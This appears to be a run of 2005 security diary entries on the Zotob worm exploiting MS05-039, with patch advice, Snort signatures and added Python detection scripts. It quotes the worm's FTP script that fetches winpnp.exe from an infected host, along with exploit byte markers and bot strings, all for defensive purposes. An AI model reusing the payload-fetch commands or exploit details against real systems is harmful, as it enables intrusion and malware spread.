I can't speak for the other handlers, but I believe the consensus opinion would be that it's messages like this one that motivate us to do what we do. Thank you for your note, and I'm glad you were able to avert disaster. :)

Back to InfoCon Green

As Johannes mentioned yesterday, we are back to green. As his addition to the diary is still relevant, it bears repeating.

As of Tuesday, 1:45 AM GMT (Monday 20:45 EDT), we moved back to infocon green.

We moved to 'Yellow' on Friday, after we saw a number of exploits released for last week's Microsoft Windows vulnerabilities, in particular MS05-039 (PnP), which is exploitable remotely.

As expected, we saw various bots, in particular 'Zotob', take advantage of this vulnerability. At this point, however, the situation is static. New bot variations keep getting developed, but they do not add any fundamentally new variation of the exploit. We expect that most exploitable systems have been compromised at this point.

The last week showed once more that there is no longer a patch window. Defense in depth is your only chance to survive the early release of malware. In this particular case, three distinct best practices can mitigate the vulnerability:
- close port 445, at least at the perimeter.

- patch systems quickly.

- eliminate NULL sessions.
None of these measures is perfect, and some may not be applicable to your network (e.g. you may require NULL sessions in some circumstances).

Another development this event brought to a conclusion is the declining importance of 'worms' relative to more sophisticated 'bots'. We received a number of bots using the PnP vulnerability. Antivirus scanners did not identify most of them. In many cases, the same bot was packed differently, or some function was added to evade detection.

Malware can only develop as fast as it is developing in this case because of extensive code sharing in the underground. The only way we can keep up with this development is by sharing information just as efficiently, and doing so openly will only make that sharing easier. Please join our effort, and share future observations with us. We will continue to turn them over quickly and make them available via our diaries for everybody to read and learn from.

I would like to thank in particular handlers Lorna and Tom for their extensive analysis of all the malware submitted.

Yes, the Internet is still "broken", but it was never working all that well to begin with. The Infocon is intended to measure change. We can't stay on yellow forever.

Johannes Ullrich.

Apple Patches

With all the attention on MS05-039, Apple released a few patches yesterday for 10.3.9 and 10.4.2 client and server.

Affected components vary by software version but include:

Directory Services

Security Interface

isc dot chris at gmail dot com

Handler on Duty
Published: 2005-08-15

Back to Green, A Word From Microsoft

A word from the Microsoft Security Response Center

Mike from the MSRC sent an e-mail with "clarification regarding changing the default setting of NULL sessions and what the impact of changing these settings does to the threat profile of the PnP vulnerability addressed in MS05-039"

The information has been published in the updated earlier today.

Take note of the section on mitigating factors.

Thanks Mike.

Back to InfoCon Green

As of Tuesday, 1:45 AM GMT (Monday 20:45 EDT), we moved back to infocon green.

We moved to 'Yellow' on Friday, after we saw a number of exploits released for last week's Microsoft Windows vulnerabilities, in particular MS05-039 (PnP), which is exploitable remotely.

As expected, we saw various bots, in particular 'Zotob', take advantage of this vulnerability. At this point, however, the situation is static. New bot variations keep getting developed, but they do not add any fundamentally new variation of the exploit. We expect that most exploitable systems have been compromised at this point.

The last week showed once more that there is no longer a patch window. Defense in depth is your only chance to survive the early release of malware. In this particular case, three distinct best practices can mitigate the vulnerability:
- close port 445, at least at the perimeter.
- patch systems quickly.
- eliminate NULL sessions.
None of these measures is perfect, and some may not be applicable to your network (e.g. you may require NULL sessions in some circumstances).
Another development this event brought to a conclusion is the declining importance of 'worms' relative to more sophisticated 'bots'. We received a number of bots using the PnP vulnerability. Antivirus scanners did not identify most of them. In many cases, the same bot was packed differently, or some function was added to evade detection.
Malware can only develop as fast as it is developing in this case because of extensive code sharing in the underground. The only way we can keep up with this development is by sharing information just as efficiently, and doing so openly will only make that sharing easier. Please join our effort, and share future observations with us. We will continue to turn them over quickly and make them available via our diaries for everybody to read and learn from.
I would like to thank in particular handlers Lorna and Tom for their extensive analysis of all the malware submitted.
Yes, the Internet is still "broken", but it was never working all that well to begin with. The Infocon is intended to measure change. We can't stay on yellow forever.

Johannes Ullrich.

McD's Bomber Message Malware

We've had several reports from folks who received messages with the subject line "McDonald's bomber jailed for life". This message includes a link to various sites under the common domain lastrez_DONOTCLICK_.com. (_DONOTCLICK_ added for emphasis!)

Visiting the site redirects to a page "mc.html" on the same site that attempts to exploit the MS05-038 bug, creating a file called w.hta. Handler David Goldsmith has called upon the Yesnic registry to stop resolving this domain, and the China-Netcom ISP to stop hosting this site, but at the time of this writing, the site is still operational. Organizations may want to consider blocking the domain to prevent click-happy users from infecting their systems.

Zotob Update

New and improved Zotob(?): Now with mass mailer. Our malware team (mostly Tom and Lorna) is faced with an increasing flood of PnP bots and worms. The most recent one looks like a Zotob. However, it does include a mass mailer.

This Zotob variant connects to the same IRC server as others, but to a different channel. Strings that are likely to be used in the Subject line for e-mail sent by this variant: Warning!!, **Warning**, Hello, Confirmed..., Important!, We found a photo of you in ..., That's your photo!!?, Hey!!, OK here is it!. The attachment included in the email looks like a zip file.

Other notable strings:
Botzor2 pnp+asn+mail spread. Greetz to good friend Coder. Based On HellBot3. f-secure,sophos ok wait bitchs!!!

Hosts redirected via the hosts file: most AV vendors, plus paypal, moneybookers, ebay and amazon.com.
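A hosts-file rewrite of this kind is one of the quickest things to check on a suspect box, because it survives a reboot and silently cuts the machine off from AV updates. The following is an added example, not code from the diary or from any vendor writeup: it parses a hosts file and flags entries that pin AV, update or payment domains to any address at all (loopback or otherwise). The watch-list, the sample hosts content and the function names are assumptions constructed for the example; extend the list for the vendors your environment actually uses.

```python
"""Check a hosts file for Zotob-style redirection of AV and payment sites.

Added example (not the diary's or a vendor's code). The watch-list is an
assumption: it names the kinds of sites the diary says the variant redirects.
"""
import ipaddress
import os

# Assumed watch-list: AV vendors, Windows Update and the payment/auction sites
# named in the diary. Hosts under these suffixes should resolve via DNS only.
WATCHED_SUFFIXES = (
    "symantec.com", "symantecliveupdate.com", "mcafee.com", "f-secure.com",
    "sophos.com", "trendmicro.com", "kaspersky.com", "windowsupdate.com",
    "paypal.com", "moneybookers.com", "ebay.com", "amazon.com",
)

# Entries that belong in every hosts file and must not be reported.
EXPECTED = {("127.0.0.1", "localhost"), ("::1", "localhost")}

# Standard location of the hosts file on Windows.
WINDOWS_HOSTS = os.path.join(
    os.environ.get("SystemRoot", r"C:\Windows"), "System32", "drivers", "etc", "hosts"
)


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every mapping; comments are stripped.

    Lines whose address does not parse are still yielded (ip kept as text) so
    the caller can report them: a malformed line is itself worth a look.
    """
    for line_no, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()
        if not body:
            continue
        fields = body.split()
        for host in fields[1:]:
            yield line_no, fields[0], host.lower().rstrip(".")


def is_watched(host):
    return any(host == s or host.endswith("." + s) for s in WATCHED_SUFFIXES)


def find_hijacks(text):
    """Return a list of findings for watched hosts that are pinned in the file."""
    findings = []
    for line_no, ip, host in parse_hosts(text):
        if (ip, host) in EXPECTED or not is_watched(host):
            continue
        try:
            addr = ipaddress.ip_address(ip)
            how = "sinkholed to loopback" if addr.is_loopback else "redirected to " + ip
        except ValueError:
            how = "malformed address " + ip
        findings.append({"line": line_no, "host": host, "ip": ip, "reason": how})
    return findings


def scan_file(path=WINDOWS_HOSTS):
    """Scan a hosts file on disk (the local Windows one by default)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_hijacks(fh.read())


# Constructed sample of what an infected hosts file might look like; not a capture.
SAMPLE_HOSTS = """\
# constructed sample, not from a real system
127.0.0.1       localhost
127.0.0.1       www.symantec.com
127.0.0.1       liveupdate.symantecliveupdate.com   # update channel blocked
127.0.0.1       www.paypal.com
127.0.0.1       www.ebay.com
10.0.0.5        update.mcafee.com                   # sent to an attacker-chosen host
192.168.1.10    intranet.example.local              # legitimate local entry
"""


if __name__ == "__main__":
    for f in find_hijacks(SAMPLE_HOSTS):
        print("line {line}: {host} -> {ip} ({reason})".format(**f))
```

Run it against the sample and five lines are reported; the localhost and intranet entries are left alone. On a live system call scan_file() instead, and treat any hit as a reason to image the box rather than just fix the file, since the same bot will have done more than edit hosts.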

More MS05-039 fun'ness

Over the course of the day we've seen what appears to be more than a handful of new bots exploiting the PnP bug (Note: PnP is not the same as UPnP, and we wonder who thought adding network-aware capabilities to PnP was a good idea). While TCP/445 scanning hasn't increased significantly, it's always a popular target, so we assume attackers are exploiting pre-populated lists of TCP/445 targets now that a "dot-slash" exploit is readily available and reliable.

Part of the uptick in compromises is likely due to existing bots being configured with the new PnP exploit code, highlighting the "blended threat" problem. Existing malware that has been making the rounds for a while receives a new breath of life when new exploit code becomes available, turning up lots of compromised systems.

A few salient points regarding the current PnP attack threat:

+ There are lots of additional 'bots' in addition to Zotob, directly targeting systems or making use of prepopulated target lists;

+ Ensure all systems have NULL sessions disabled to block the current threats;

+ Block TCP/445 ingress and egress whenever possible to stop incoming attacks, and to detect infected systems leaving your network;

+ Do not rely on TCP/33333 FTP service detection to identify compromised systems as this port is not used consistently in later bot variants;

+ Ensure AV signatures are up-to-date;

+ Patch!

New Zotob variant (Zotob.b)

F-Secure is reporting a new variant of the Zotob worm currently exploiting the PnP vulnerability addressed in MS05-039. The Zotob.B variant uses the same ports (TCP/445 for scanning, TCP/8888 command shell on exploited systems, TCP/33333 for FTP server) as the previous variant, but uses the executable name "csm.exe" with the description "csm Win Updates" in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices key to load the worm when the system boots. Zotob.A uses the executable name "botzor.exe" in the same registry key.

It is not believed that the Zotob.B worm possesses any additional characteristics that would make it more of a threat than Zotob.A.




Zotob affecting some XP SP2/2003?

Reader Samuli writes in (thanks Samuli!) pointing out that the houseofdabus code used in the Zotob worm to exploit the Microsoft PnP vulnerability addressed in MS05-039 relies on NULL sessions to exploit the target system. Default installations of Windows XP SP2 and Windows 2003 do not have NULL sessions enabled, and thus are not affected by the worm. However, some server roles may require administrators to enable NULL session functionality, such as legacy domain controllers, Microsoft Exchange servers, Microsoft SQL Servers, etc. If you have permitted NULL session access on your managed systems, you may be at risk of infection by one of the Zotob variants.

Administrators can check their Windows XP SP2 systems to identify whether NULL sessions are disabled by checking the registry value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymoussam, ensuring it is set to 1 (enabled). Note that the sibling value "restrictanonymous" governs the ability to anonymously enumerate shares on the system, not the ability to enumerate user accounts. If you're checking your systems, you may want to set both values to 1 to also prevent an anonymous attacker from enumerating shares, although this will require testing to ensure it does not break valid applications.

Update: Reader Chuck Croll writes in with the following comments regarding disabling anonymous share browsing:

"Note that if you enable blocking of anonymous share enumeration, by setting HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous to "1", you will break Windows Networking, ie the ability for the browser subsystem to enumerate servers in Network Neighborhood.

A lot of people have no idea what the browser is, and when Network Neighborhood breaks, can't even describe it accurately."

All the more reason to test settings before applying them in a production environment! Thanks Chuck!
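The two registry values discussed above are easy to misread, so here is an added example (not the diary's code) that reads them from HKLM on an XP SP2 or 2003 host and turns them into a verdict, following the interpretation given above: RestrictAnonymousSAM = 1 is what closes the NULL-session path the houseofdabus exploit needs, and RestrictAnonymous = 1 additionally blocks anonymous share enumeration at the cost of the browse list Chuck describes. The value names and key path are the ones the diary cites; the function names, the verdict wording and the decision to treat an absent value as 0 are assumptions of the example. Windows 2000 does not carry RestrictAnonymousSAM, so this check is for XP SP2 and 2003 as in the diary.

```python
"""Assess RestrictAnonymous / RestrictAnonymousSAM for the NULL-session path.

Added example, not the diary's code. Reading the registry needs Windows;
assess() is pure so it can be run against values collected from any host
(e.g. exported with reg.exe and parsed elsewhere).
"""
import sys

LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"
VALUE_NAMES = ("RestrictAnonymous", "RestrictAnonymousSAM")


def read_lsa_values():
    """Return {name: int or None} from HKLM on the local Windows host."""
    if not sys.platform.startswith("win"):
        raise OSError("registry access requires Windows; pass values to assess() instead")
    import winreg  # only importable on Windows

    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LSA_KEY) as key:
        for name in VALUE_NAMES:
            try:
                values[name] = int(winreg.QueryValueEx(key, name)[0])
            except FileNotFoundError:
                values[name] = None  # absent value is treated as 0 by assess()
    return values


def assess(values):
    """Classify a {name: value} mapping (assumption: absent/None counts as 0)."""
    ra = values.get("RestrictAnonymous") or 0
    ra_sam = values.get("RestrictAnonymousSAM") or 0
    null_session_blocked = ra_sam == 1          # the worm's exploit path
    share_enum_blocked = ra >= 1                # anonymous share enumeration
    notes = []
    if not null_session_blocked:
        notes.append(
            "RestrictAnonymousSAM=%d: anonymous (NULL) sessions allowed, so the "
            "current Zotob variants can reach the PnP pipe. Set to 1 and patch MS05-039."
            % ra_sam)
    if not share_enum_blocked:
        notes.append(
            "RestrictAnonymous=%d: anonymous share enumeration allowed. Setting 1 "
            "breaks Network Neighborhood browse-list enumeration; test first." % ra)
    return {
        "null_session_blocked": null_session_blocked,
        "share_enum_blocked": share_enum_blocked,
        "null_session_path_open": not null_session_blocked,
        "notes": notes,
    }


if __name__ == "__main__":
    try:
        current = read_lsa_values()
    except OSError as err:
        print(err)
        current = {"RestrictAnonymous": 0, "RestrictAnonymousSAM": 0}  # demo values
    verdict = assess(current)
    print("NULL session path open:", verdict["null_session_path_open"])
    for note in verdict["notes"]:
        print(" -", note)
```

The point of keeping assess() separate from the registry read is that the same logic can be run over values pulled from hundreds of hosts by whatever inventory tool you already have, and the two findings stay distinct: the first one is the worm exposure, the second is the hardening step that needs the testing Chuck warns about.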

It is still vital that organizations apply the most recent patch updates from Microsoft to resolve several vulnerabilities in Windows. While the current Zotob worm may not be able to exploit default installations of Windows XP SP2 and Windows 2003, it certainly won't be long before there is a variant without this limitation.

What's more, there appears to be some confusion among AV vendors as to the vulnerability of Windows 95/98/ME/NT4 systems. Symantec claims that while these legacy operating systems cannot be infected (likely because they aren't vulnerable to the PnP bug), they can be used as propagation vectors if the Zotob code is executed on the system. Another vendor's writeup briefly mentions that Zotob runs on all of these Windows platforms, but does not provide additional information.

Paul Asadoorian from Brown University has written and maintains an excellent paper on the subject. Thanks Paul!

-Joshua Wright/Handler-on-duty
Published: 2005-08-14

MS05-039 Worm in the wild

-039 is NOT Microsoft's lucky number

One of our readers, John Smith, submitted this:

"Interesting game of numbers:

SQL Slammer was using bug fixed in MS02-039

Zotob is using bug fixed in MS05-039

Hex 39 is 57 decimal, which is big W (Worm? Windows?) in ASCII."

Update (2005-08-15@10:43UTC): hex 39 is ASCII "9", but hex 57 is ASCII "W". Maybe it's a conspiracy involving the American National Standards Institute (ANSI)? OK, maybe not. -Josh

The technical details:

Starting around 11:30 UTC, we've received several reports on a new worm variant that makes use of MS05-039 to spread. If you're not patched yet, this is your last call.

F-Secure named the critter "Zotob.A": http://www.f-secure.com/weblog/

We've also received a submission of a binary called "pnpsrv.exe", which is recognized by ClamAV as Trojan.Spybot-123. Another reader has contributed evidence that a successful exploit by Zotob.A (or variant)

The worm will download the main payload from the infecting machine. Once a machine is infected, it will become an ftp server itself. It will scan for open port 445/tcp. Once it finds a system with port 445 listening, it will try to use the PnP exploit to download and execute the main payload via ftp.

Important facts so far:
- Patch MS05-039 will protect you
- Windows XP SP2 and Windows 2003 cannot be exploited by this worm, as the worm does not use a valid logon.
- Blocking port 445 will protect you (but watch for internal infected systems)
- The FTP server does not run on port 21. It appears to pick a random high port.

Quick FTP log (the script the worm feeds to the FTP client):
  open aaa.bbb.ccc.ddd 31656
  user 1 1
  get winpnp.exe
  quit
(IP address obfuscated). We'll keep adding to this diary as new information becomes available.

Thanks so far to Johnathan Norman from Alert Logic for a lot of the details.
Other good information can be found at the F-Secure weblog at http://www.f-secure.com/weblog/
Also see the Microsoft MS05-039 bulletin from last week: http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
Please submit any new code captures via our contact page:
If possible, do not pack/encrypt the uploads; maybe provide an md5 sum to preserve the code in its original beauty.

Shown below are Snort rules, submitted by the members of the Alert Logic Security Research Team:
Jeremy Hewlett, Technical Director of Security Research
Johnathan Norman, Sr. Security Analyst
Chris Baker, Technical Director of Security Operations

alert tcp any any -> any 445 (msg:"EXPLOIT SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|67157a76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000130; rev:1;)

alert tcp any any -> any 139 (msg:"EXPLOIT NETBIOS SMB Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000131; rev:1;)

alert tcp any any -> any 445 (msg:"EXPLOIT NETBIOS SMB-DS Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset: 4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000132; rev:1;)
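To make the content matches in those rules readable as structure, here is an added example (not Alert Logic's code) that checks a captured TCP/445 or TCP/139 payload the same way the rules do: a NetBIOS session frame carrying SMB_COM_TRANSACTION (the "%", 0x25, in |FF|SMB%), the TransactNmPipe subcommand (|2600| at offset 65, which is where Setup[0] of a TRANSACTION request sits), the |3600| word at offset 110, and either of the two four-byte sequences the rules carry. Reading the word at offset 110 as the DCE/RPC opnum is an assumption of this example, not something the diary states. The sample frames are constructed to exercise the checks and are not captured exploit traffic.

```python
"""Structural equivalent of the Alert Logic Snort rules above (added example).

Offsets are absolute from the start of the TCP payload, as in the rules:
  0    NetBIOS session header (4 bytes)
  4    "\xffSMB"; SMB command byte at offset 8 (0x25 = SMB_COM_TRANSACTION)
  65   Setup[0] of a TRANSACTION request (0x0026 = TransactNmPipe)
  110  the word the rules match as |36 00|; assumed here to be the DCE/RPC opnum
The four-byte sequences are the ones the rules carry. They are exploit-specific
and will miss an exploit built with other addresses, which is why every
structural indicator is reported on its own as well as in the final verdict.
"""
import struct

SMB_COM_TRANSACTION = 0x25
TRANS_TRANSACT_NMPIPE = 0x0026
RULE_MARKERS = (bytes.fromhex("67157a76"), bytes.fromhex("f6387a76"))


def inspect_payload(payload):
    """Return which indicators fired for one SMB-over-TCP payload."""
    hit = {"smb_transaction": False, "transact_nmpipe": False,
           "word_0x36_at_110": False, "rule_marker": False, "alert": False}
    if len(payload) < 67 or payload[4:8] != b"\xffSMB":
        return hit
    hit["smb_transaction"] = payload[8] == SMB_COM_TRANSACTION
    hit["transact_nmpipe"] = struct.unpack_from("<H", payload, 65)[0] == TRANS_TRANSACT_NMPIPE
    if len(payload) >= 112:
        hit["word_0x36_at_110"] = struct.unpack_from("<H", payload, 110)[0] == 0x0036
    hit["rule_marker"] = any(m in payload for m in RULE_MARKERS)
    # Same conjunction as the rules: TRANSACTION + TransactNmPipe + marker bytes.
    hit["alert"] = hit["smb_transaction"] and hit["transact_nmpipe"] and hit["rule_marker"]
    return hit


def build_sample(subcommand, word_at_110, tail):
    """Constructed frame with only the fields the checks look at populated."""
    frame = bytearray(116)
    frame[4:8] = b"\xffSMB"
    frame[8] = SMB_COM_TRANSACTION
    struct.pack_into("<H", frame, 65, subcommand)
    struct.pack_into("<H", frame, 110, word_at_110)
    frame += tail
    struct.pack_into(">H", frame, 2, len(frame) - 4)   # NBSS length field
    return bytes(frame)


# Constructed samples, not captures.
EXPLOIT_LIKE = build_sample(TRANS_TRANSACT_NMPIPE, 0x0036, RULE_MARKERS[0] + b"A" * 16)
BENIGN_PIPE_CALL = build_sample(TRANS_TRANSACT_NMPIPE, 0x0001, b"\x00" * 20)


if __name__ == "__main__":
    for name, frame in (("exploit-like", EXPLOIT_LIKE), ("benign pipe call", BENIGN_PIPE_CALL)):
        print(name, inspect_payload(frame))
```

The benign frame shows the caveat: a legitimate named-pipe transaction trips the first two structural checks and only the marker bytes separate it from the exploit, so a bot that rebuilds the exploit with different return addresses will slip past both these rules and this check. Logging the structural indicators on their own, keyed by source, is what lets you spot that case.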

Handlers contributing to this diary so far:
Daniel Weseman, Johannes Ullrich, Tony Carothers, William Salusky and Donald Smith.


Published: 2005-08-13

PnP Worm out; More on the current Veritas vuln; Microsoft Update and Win 2K3 w/o SP1; new gaim version

PnP Worm Out


Quick update: Several reports that the PnP (MS05-039) worm has finally been released. We are analyzing the code now.

We remain at infocon yellow, but fortunately, we haven't yet seen any worms exploiting the vulnerabilities covered by last Tuesday's Microsoft bulletins. If things stay quiet through Sunday, we'll likely move back to green on Monday, but we reiterate our warning from yesterday: there are enough exploits for these vulnerabilities known to be in the wild that we believe it is only a matter of hours, or at most days, until they are integrated into a worm.

More thoughts on the current Veritas Backup Exec vulnerability

One of our readers (thanks, Frank) pointed out that although the bulletins concerning the Veritas Backup Exec vulnerabilities only mentioned the possibility of READING data from a vulnerable server, the nature of the NDMP protocol makes it likely that it could be exploited to WRITE data to a server as well. Several people have been working on proof of concept code today, so it probably won't be long before working exploits are in the wild for this one, too. We are hearing reports of exploit attempts in the wild. Again, see yesterday's diary for our recommendations on blocking port 10000. Also, thanks to Juha-Matti for pointing out that this vulnerability exists not just in Backup Exec, but also in NetBackup for NetWare. See the vendor advisory for further details.

Microsoft Update and Win2K3 w/o SP1

Another of our readers, Wolf, brought this issue to our attention. Some admins have chosen not to install Windows 2003 Server SP1 until issues have been worked out. This has led to a problem that the admins may not be aware of. If you use Microsoft Update and choose the Express (recommended) option, it will NOT show the July or August updates, you have to choose Custom updates in order to see them. This could be very dangerous as it may leave the admins believing their servers are current on patches when in fact they are exposed.

new gaim version

Users of the popular gaim multi-protocol instant messenger client are urged to upgrade to 1.5.0 immediately, since this version fixes 3 security bugs. See
http://gaim.sourceforge.net/security/ for details.


Jim Clausing, jclausing_at_isc.sans.org


Published: 2005-08-12

Infocon Yellow; Windows and Backup Exec exploits are out, where are the exploits, NIST drafts, Snort signatures

Infocon: Yellow

Due to a number of well-working Windows exploits for this week's patch set, and the zero-day Veritas exploit, we decided to turn the infocon to yellow.

Advice: Use the weekend to patch ALL WINDOWS SYSTEMS. It may be worthwhile to consider accelerated deployment of the patches even to critical systems if the weekend is slow anyway. Backup Exec should be firewalled or disabled at this point.

Note: Consider unprotected internet-facing machines infected at this point if they do not have this week's patches applied. Patch and handle them with extra care.

Windows and Backup Exec exploits are out

In case you're waiting to see whether it's worth updating either Windows or Veritas' Backup Exec, now's the time to do so. Live exploits are out for both.

Specifically, MS05-039 appears to have 3 live exploits out for it already, and Backup Exec has at least one exploit out.

We've said it already, but it's worth repeating - get those patches in soon...

Which exploits are really out?

We've gotten a number of questions from readers about the exploits we've mentioned over the past few days in the diary. Some of them are publicly known and easily Google-able. Others are ones that we've found out about from trusted sources that have asked us to not share the exploit itself.

Because our goal is to provide timely alerts to the security community, we generally don't provide the exploit code itself. If it truly is publicly visible, you'll find it in a few minutes without our help. And if the exploit is still generally private, we don't want to be the conduit that accelerates attacks - people with lots of hat colors read this diary. *smile*

Thanks for understanding.

NIST drafts

NIST has provided several draft security documents: Creating a Patch and Vulnerability Management Program, Secure DNS Deployment Guide, Guide to Malware Incident Prevention and Handling, Guide to Single-Organization IT Exercises, Guide to Computer and Network Data Analysis: Applying Forensic Techniques to Incident Response, and Codes for the Identification of Federal and Federally-Assisted Organizations.

Preliminary Snort signatures for MS exploits

One reader was kind enough to forward some Snort signatures for
malware hitting the recently announced vulnerabilities. Credit for
these signatures goes to Blake Harstein at Demarc.

To not have the lines go on too long, the pcre's have been split
over multiple lines; everything from pcre: to /i"; needs to be
reassembled into one object with no spaces.

#These rules are separated for compatibility with Snort 2.3.3 (>850
#characters per line), If you are using Snort >2.4.0 you can safely
#combine these into a single rule

EXPLOIT CLSID Pattern Matched"; flowbits:isnotset,CLSID_DETECTED;
flowbits:noalert; flowbits:set,CLSID_DETECTED; classtype:not-suspicious;
sid:2002174; rev:2;)

EXPLOIT COM Object Instantiation Memory Corruption Vulnerability (group
1)"; flow:established,from_server; flowbits:isset,CLSID_DETECTED;
classtype:web-application-attack; reference:cve,2005-1990;
sid:2002171; rev:2;)

EXPLOIT COM Object Instantiation Memory Corruption Vulnerability (group
2)"; flow:established,from_server; flowbits:isset,CLSID_DETECTED;
classtype:web-application-attack; reference:cve,2005-1990;
sid:2002172; rev:2;)

EXPLOIT COM Object Instantiation Memory Corruption Vulnerability (group
3)"; flow:established,from_server; flowbits:isset,CLSID_DETECTED;
classtype:web-application-attack; reference:cve,2005-1990;
sid:2002173; rev:2;)

-- Handler on Duty,

Published: 2005-08-11

* Veritas Backup Exec 0-day; POC code available for multiple updated MS vulns; P2P on the Vista

ISCAlert has been activated (that blinking globe thing) to warn people about MS05-039 related activity that may go critical over the weekend. Three separate exploits for the PnP issue have been released over the last 24 hours. Please patch your systems if you haven't already. Thank you.

FrSIRT has released an advisory containing what they call "Veritas Backup Exec Windows Agent Remote File Access Exploit (0day)"

The ISC has already seen an increase in scans for port 10000, and advises any users of Backup Exec to deny access to that port from all untrusted networks. Frank Knobbe has made available a rough draft signature that may help identify attempts against B.E.:

alert tcp $EXTERNAL_NET any -> $HOME_NET 10000 (msg:"BLEEDING-EDGE Veritas \
Backup Exec Windows Agent Remote File Access Exploit"; \
flow:to_server,established; \
content:"|b4 b8 0f 26 20 5c 42 34 03 fc ae ee 8f 91 3d 6f|"; \
reference:url,www.frsirt.com/english/advisories/2005/1387; \
reference:url,www.frsirt.com/exploits/20050811.backupexec_dump.pm.php; \
classtype:string-detect; sid:2002176; rev:1;)

Thanks, Frank!

POC code available for multiple updated MS vulns

The vulnerabilities addressed in MS05-038, MS05-039, MS05-040 and MS05-043, all covered in this month's Fat Tuesday festivities, have already fallen victim to publicly released exploits. Both bugtraq and Daily Dave have postings today announcing the availability of said code. Now, I haven't built or tested any of it, so I can't personally vouch for the effectiveness of any of it, but if it isn't working as intended you can bet it will be shortly. Patch up, folks.

P2P on the Vista

We received some packets today from someone who was chomping at the bit to get his Windows Vista up and on the wire, and was in for an interesting surprise. After a short while, he was being barraged with a good number of UDP port 53186 packets from around the globe. A bit of digging gave me an education in Teredo, Microsoft's IPv6-over-IPv4 encapsulation, discussed in:
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/teredo.mspx and RFC3904. Teredo's strength is its ability to traverse NAT firewalls while maintaining the protections offered by IPv6, and it has been used to build tunnels for plenty of OSes and applications, including Windows P2P and especially the Peer Name Resolution Protocol, PNRP.

Gee, George, why do I care? Well, Tommy, there are wonderful things waiting just around the corner...let me show you.

From "Introduction to Windows Peer-to-Peer Networking":

"P2P PNRP uses multiple clouds, in which a cloud is a grouping of computers that use addresses of a specific scope. A scope is an area of the network over which the address is unique. PNRP clouds are based on the address scopes for IPv6 addresses."

Now, to test the scalability of some new PNRP features, Microsoft has decided to turn on pnrpauto, PNRP Auto Registration, by default in the Vista beta. Boot up your shiny new Vista and a PNRP name gets generated, and out goes the registration. Now come the name resolvers a-knockin'. Bingo! Instant anomaly IDS test!

If you aren't all too happy with this arrangement, feel free to kill it off using the Task Manager or "net stop pnrpauto". My advice is to do this before ever putting the box on the wire. Otherwise, it may take some time for the cloud to realize that you aren't playing anymore, and the traffic will continue.

Many thanks to Noah Horton for helping the ISC get a handle on what was going on. He also made a blog entry discussing this a bit further at: http://blogs.msdn.com/noahh/




Published: 2005-08-10

Patch Refresher; MS05-038 Issues

Patch Refresher

Okay, what else would follow a patch Tuesday but a chaotic Wednesday. Just as a refresher on the patches we're dealing with:

Bulletin   Severity    Impact

MS05-038   Critical    Remote Code Execution
MS05-039   Critical    Remote Code Execution and Elevation of Privilege
MS05-040   Important   Remote Code Execution
MS05-041   Moderate    Denial of Service
MS05-042   Moderate    Denial of Service, Information Disclosure, and Spoofing
MS05-043   Critical    Remote Code Execution

For a more in depth review, please see Cory's great diary from yesterday found at http://isc.sans.org/diary.php?date=2005-08-09

MS05-038 Issues

It seems that there are issues with downloading the MS05-038 patch and it appears as unavailable. Many thanks to Rick Hoppe who pointed us to the following information found at http://blogs.technet.com/msrc/default.aspx

"Not long after we released this morning, we found out that many of the digital signatures on some of the IE updates for MS05-038 were corrupted and were preventing install. This only impacts those downloading from the Download Center, not Windows Update, Microsoft Update, SUS, or WSUS. At least now we know what the problem is and it should be fixed soon. "

The message that I received when I tried to download it read:

"The download you requested is unavailable. If you continue to see this message when trying to access this download, go to the "Search for a Download" area on the Download Center home page."

We'll keep you posted as we learn more. It looks to be another interesting day in the world of network security.

Lorna Hutcheson

Handler on Duty



Published: 2005-08-09

Black Tuesday Patch Roundup, Panic and/or Mayhem ensues

Microsoft Security Bulletins for August

Happy Black Tuesday, kids! We've got six bulletins for your patching pleasure, so let's get right to it. We'll be updating this throughout the day as we have more time to interpret the bulletins and analyze the patches, but here's a quick overview to stave off the impending flood of "August MS Patches are ONLINE" emails. ;)

Update: We've got writeups on each patch below - expect more details to emerge over the next few days.

Bulletin   Severity    Impact

MS05-038   Critical    Remote Code Execution
MS05-039   Critical    Remote Code Execution and Elevation of Privilege
MS05-040   Important   Remote Code Execution
MS05-041   Moderate    Denial of Service
MS05-042   Moderate    Denial of Service, Information Disclosure, and Spoofing
MS05-043   Critical    Remote Code Execution

MS05-038: Arbitrary code execution vulnerabilities in Internet Explorer

Severity: Critical


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

* 98, 98SE, and ME

Affected Components:

* Internet Explorer 5.01 SP4 through 6 SP1 on various Windows platforms


* MS05-025

* MS05-037

MS05-038 fixes multiple vulnerabilities in Internet Explorer which can be exploited to run arbitrary code. Some of the fixed vulnerabilities have already been disclosed publicly.

Handler chatter:

The handlers are of the opinion that of the bulletins released today, this is the avenue most likely to be explored (or the avenue currently being explored) by purveyors of malware. While image rendering vulnerabilities have led to cacophonous cries of "The worms are coming! The worms are coming!" in the past, we believe that there is a far greater likelihood of these flaws being exploited to drop relatively immobile malcode: spyware, bots, and other decidedly non-viral badness.

